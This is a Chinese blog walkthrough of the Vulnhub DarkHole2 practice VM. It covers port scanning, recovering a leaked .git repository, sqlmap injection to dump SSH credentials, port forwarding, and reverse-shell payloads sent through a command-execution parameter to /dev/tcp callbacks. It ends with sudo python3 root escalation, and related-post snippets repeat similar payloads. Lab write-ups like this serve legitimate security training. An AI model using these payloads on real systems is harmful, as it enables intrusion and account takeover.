看完这篇 教你玩转渗透测试靶机vulnhub—DarkHole2

已于 2023-06-23 14:27:38 修改
阅读量1.3k 收藏 9
点赞数 9
CC 4.0 BY-SA版权
分类专栏: 渗透测试 # Vulnhub靶场 文章标签: git github Vlunhub靶机 sqlmap sudo提权
于 2023-05-31 16:54:45 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/Aluxian_/article/details/130960951

Vulnhub靶机DarkHole2渗透测试详解

Vulnhub靶机介绍:

vulnhub是个提供各种漏洞平台的综合靶场,可供下载多种虚拟机进行下载,本地VM打开即可,像做游戏一样去完成渗透测试、提权、漏洞利用、代码审计等等有趣的实战。

这是一个漏洞靶机,老样子需要找到flag即可。

Vulnhub靶机下载:

官网链接:https://download.vulnhub.com/darkhole/darkhole_2.zip

Vulnhub靶机安装:

下载好了把安装包解压 然后使用VMware打开即可。

在这里插入图片描述

Vulnhub靶机漏洞详解:

①:信息收集:

kali里使用arp-scan -l发现主机

在这里插入图片描述
渗透机:kali IP :172.16.5.120 靶机IP :172.16.5.170

使用命令:nmap -sS -sV -T4 -n -p- 172.16.5.170

在这里插入图片描述
在这里插入图片描述

DarkHole1一样也是开启了2280端口 还是老样子使用Web扫描工具扫描 dirb、dirsearch、whatweb等 发现了git信息泄露

在这里插入图片描述
在这里插入图片描述
在这里插入图片描述

②:Git信息泄露:
git clone https://github.com/lijiejie/GitHack.git  #下载GitHack
python3 GitHack.py http://172.16.5.170/.git  #将源码下载本地
##PS: 我这里kali没网直接复制压缩包进去 都一样的

在这里插入图片描述

在这里插入图片描述
在这里插入图片描述
发现好像是数据库的命令,这里需要使用wegt./git 下下载:wget -r http://172.16.5.170/.git

下载了 .git目录后,使用git clone . webapp 命令会将该目录创建一个webapp的源码文件,可以在其中执行所有 git 操作。

在这里插入图片描述
然后执行 git log 发现git日志当中存在修改记录,切换到该条记录下进行修改将 HEAD切换到master

git checkout a4d9
cat login.php

在这里插入图片描述

在这里插入图片描述
得到密码为:lush@admin.com/321 尝试登入 发现登入成功!!!!

在这里插入图片描述

③:SQL注入:

发现网页URLid存在可能存在SQL注入可以直接使用sqlmap工具,F12获取网页cookie值:PHPSESSID=hlt3utsl914cg3q9jpu8a9fpn4

在这里插入图片描述
在这里插入图片描述
在这里插入图片描述

sqlmap -u "http://172.16.5.170/dashboard.php?id=1" --cookie="PHPSESSID=hlt3utsl914cg3q9jpu8a9fpn4"  --batch  #存在漏洞

在这里插入图片描述

sqlmap -u "http://172.16.5.170/dashboard.php?id=1" --cookie="PHPSESSID=hlt3utsl914cg3q9jpu8a9fpn4"  --batch  --current-db ##列出数据库

在这里插入图片描述

sqlmap -u "http://172.16.5.170/dashboard.php?id=1" --cookie="PHPSESSID=hlt3utsl914cg3q9jpu8a9fpn4"  --batch  -D darkhole_2 --tables ##列出表

在这里插入图片描述

 sqlmap -u "http://172.16.5.170/dashboard.php?id=1" --cookie="PHPSESSID=hlt3utsl914cg3q9jpu8a9fpn4"  --batch  -D darkhole_2 -T  ssh --dump ##获取内容

在这里插入图片描述
得到了账号密码:jehad/fool 尝试SSH登入!!

④:SSH登入:

在这里插入图片描述

⑤:漏洞利用&提权:
sudo -l
find / -user root -perm -4000 -print 2>/dev/null  #查看有没有 SUID 文件可以利用
cat .bash_history #查看历史文件  
cat /etc/crontab #查看定时任务

在这里插入图片描述

在这里插入图片描述

在这里插入图片描述
在这里插入图片描述
存在一个Web 9999端口 访问不了 尝试端口转发到本地:ssh -L 9999:127.0.0.1:9999 jehad@172.16.5.170

历史记录里面有查看id命令 发现是losy用户的普通权限 可以开启nc 监听 反弹shell

在这里插入图片描述
在这里插入图片描述

在这里插入图片描述

PS:因为我在学校没做完 回家接着做所以这里的ip变了 但是不影响

bash -c 'sh -i >& /dev/tcp/192.168.0.126/7777 0>&1' #因为这里是GET传参 所以需要url编码
bash%20-c%20%27bash%20-i%20%3E%26%20/dev/tcp/192.168.0.126/7777%200%3E%261%27  
curl http://127.0.0.1:9999/?cmd=bash%20-c%20%27bash%20-i%20%3E%26%20/dev/tcp/192.168.0.106/7777%200%3E%261%27
/bin/bash -i
history  #查看历史文件

在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述

可以看到提权命令以及losy用户密码:gang 然后SSH登入!! sudo -l 查看 有sudo权限

在这里插入图片描述
在这里插入图片描述

sudo /usr/bin/python3 -c 'import os; os.system("/bin/sh")'  ###提权

在这里插入图片描述

⑥:获取FLAG:

在这里插入图片描述
至此至此获取到了flag,本篇文章渗透结束 感谢大家的观看!!

Vulnhub靶机渗透总结:

这个靶机难度适中
1.信息收集 获取ip地址 和端口信息 web扫描工具:nikto,dirb,dirbuster,whatweb等‘
2.sqlmap工具cookie注入 获取信息
3.这里需要主要的 端口转发 如果这个失败了 后面执行 curl是失败的 这里卡了一会不然弹不上
4.GET 传参 url编码 最后就是提权了sudo提权。

这个系列的两篇完结啦!最后创作不易 希望对大家有所帮助 喜欢的话麻烦大家给个一键三连 你的开心就是我最大的快乐!!

2024年最新VulnHub-DarkHole_2靶机实战(超详细保姆级程)
2401_84239830的博客
05-01 1382
记得我们查看过9999端口运行的程序,当我们看到源代码的内容时,我们看到这允许远程命令执行。而且这个脚本属于用户losy,然后我们就可以使用 SSH 隧道连接端口 9999,然后,访问 127.0.0.1:9999 进行 RCE。id=1’ and 1=2 --+ #页面信息消失,说明id的闭合为单引号。到此,我们就可以进行ssh连接了.下面是拓展工具注入的方式.着急看结果的宝宝们可以直接移步下面的ssh连接步骤.
Vulnhub靶机渗透测试 DC-8靶机
12-07
Vulnhub靶机渗透测试 DC-8靶机
darkhole2
qq_62144749的博客
09-02 501
vulnhub darkhole2
DARKHOLE: 2
weixin_45042115的博客
10-05 1952
信息收集 靶机下载地址为:vulnhub-DARKHOLE: 2 今日 的靶机漏洞练习 kali :100.100.100.131/24 靶机:100.100.100.132/24 依旧使用nmap神器对局域网主机开放服务端口进行扫描,瞅瞅有没有可以利用端口 nmap -v -T4 -sC -sV -p- 100.100.100.0/24 发现有100.100.100.132 主机有wbe页面 这个应该就此此次的目标了,对它单独的扫描一次,收集更多信息 发现开放22端口和80端口,即对应的远程连接
渗透测试DarkHole 2靶场渗透测试
最新发布
小司机的奥拓
06-25 703
选择镜像文件进行下载。下载后解压是一个zip文件,在虚拟机中选择-打开虚拟机,选择此文件,然后修改系统网卡为NAT,在高级选项中注意网卡的MAC地址,方便后续查出本机IP。无。获取root限,共有两个flag。确定IP地址、端口扫描、网站访问、目录扫描、网站下载、获得邮箱和密码。使用nmap确定该靶场IP地址,地址为:192.168.241.181。使用nmap进行端口扫描,发现其开放22和80端口。22端口开放SSH服务,OpenSSH 8.1p1;
vulnhub靶场————darkhole 2
m0_65809311的博客
08-17 1451
nmap 、gitgit log git checkout ) 、 linux命令 、 python命令·.bash_history文件这次靶场主要是学习了文件,命令等基础知识。思路还是很简单的。
Neos的渗透测试靶机练习——DarkHole-2
qq_38678845的博客
01-22 1471
一次渗透测试靶机练习
DarkHole_2靶场
zjxxxy的博客
06-14 517
vulnhub靶场DarkHole_2攻略
Vulnhub靶机渗透测试 Five-1靶机
12-07
Vulnhub靶机渗透测试 Five-1靶机
Vulnhub靶机渗透测试 DC-3靶机
12-07
Vulnhub靶机渗透测试 DC-3靶机
Vulnhub靶机渗透测试 DC-9靶机
12-07
Vulnhub靶机渗透测试 DC-9靶机
vulnhubdarkhole_2
weixin_54431413的博客
07-04 840
首先进行了下载了.git,对其中各个版本源码来审计,拿到后台登录限,之后利用sql注入拿到jhead的密码。通过对.bash_history的查看,发现了本地执行用户为lucy的9999的命令执行漏洞,水平到lucy,通过对lama的暴力破解拿到root,通过lucy的sudo...
VulnHub-DarkHole_2靶机实战(超详细保姆级程)
精品博客,你值得一看~
08-13 7137
记得我们查看过9999端口运行的程序,当我们看到源代码的内容时,我们看到这允许远程命令执行。bash -c ‘bash -i >& /dev/tcp/192.168.184.156/9001 0>&1’ #记得修改你的IP。id=1' and 1=2 --+ #页面信息消失,说明id的闭合为单引号。到此,我们就可以进行ssh连接了.下面是拓展工具注入的方式.着急看结果的宝宝们可以直接移步下面的ssh连接步骤.
DarkHole2 vulnhub靶场
weixin_62621015的博客
03-16 362
DarkHole2 vulnhub靶场个人通关笔记 不是很难
Vulnhub--DarkHole:2
weixin_45168704的博客
06-14 294
DarkHole2
DARKHOLE 2
Czheisenberg的博客
02-18 722
vulnhub靶场——DarkHole 2 WriteUp
DarkHole2渗透测试
weixin_43769253的博客
07-29 567
vulnhub靶机DarkHole2渗透记录 难度:高
DarkHole 2靶场详细
weixin_60374959的博客
11-22 872
本次靶场所运用到的知识点1.源码分析(.git信息泄露)2.sql注入3.sudo(.bash_histroy历史命令
Darkhole2服务器靶场漏洞利用工具
06-20
### Darkhole2服务器靶场漏洞利用工具及渗透测试技术 #### 1. Git存储库泄露的利用工具 在Darkhole2靶场中,通过`.git`目录泄露了完整的Git仓库,攻击者可以使用`git-dumper`工具来还原整个Git存储库[^2]。以下是`git-dumper`的基本用法: ```bash git-dumper http://target-ip/.git/ /path/to/output ``` 此工具能够从目标服务器下载`.git`目录中的所有文件,并重构出完整的代码库。 #### 2. 路径遍历漏洞的利用 靶场中存在路径遍历漏洞,允许攻击者通过构造恶意参数访问受限文件。例如,通过以下URL可以读取敏感文件: ``` http://target-ip/vulnerable-script.php?file=../../../../etc/passwd ``` 为检测此类漏洞,可以使用自动化扫描工具如`Dirb`或`Nikto`,它们可以帮助识别潜在的路径遍历问题[^1]。 #### 3. 命令注入漏洞的利用 Darkhole2靶场中的命令注入漏洞允许攻击者通过`cmd`参数执行任意系统命令。利用这一漏洞可以通过以下方式实现升: ```bash curl "http://target-ip/vulnerable-script.php?cmd=id" ``` 针对此类漏洞,建议使用模糊测试工具如`Burp Suite`进行检测和验证,同时对用户输入进行全面验证以防止命令注入攻击。 #### 4. 环境变量与定时任务滥用 靶场中还展示了如何通过环境变量和定时任务实现升。攻击者可以通过修改关键环境变量或创建恶意定时任务来维持持久化访问。为了防范此类攻击,应定期检查并清理不必要的环境变量和定时任务。 ```bash # 检查环境变量 printenv # 检查定时任务 crontab -l ``` #### 5. Web应用安全测试工具 对于Web应用的安全测试,可以使用以下工具进行漏洞扫描和渗透测试: - **SQLMap**:用于检测和利用SQL注入漏洞。 - **OWASP ZAP**:供全面的Web应用安全扫描功能。 - **Metasploit**:支持多种漏洞利用模块,可用于模拟攻击场景。 ```python import requests def test_sql_injection(url, param): payload = "' OR '1'='1" response = requests.get(f"{url}?{param}={payload}") if "error" in response.text: print("Potential SQL Injection vulnerability detected.") ``` #### 6. 日志分析与监控 为了发现潜在的安全威胁,应部署日志分析和监控系统。例如,使用`ELK Stack`(Elasticsearch, Logstash, Kibana)来集中管理和分析日志数据,及时发现异常行为。 ```bash # 安装ELK Stack sudo apt-get install elasticsearch logstash kibana ```
评论 6
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

落寞的魚丶

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值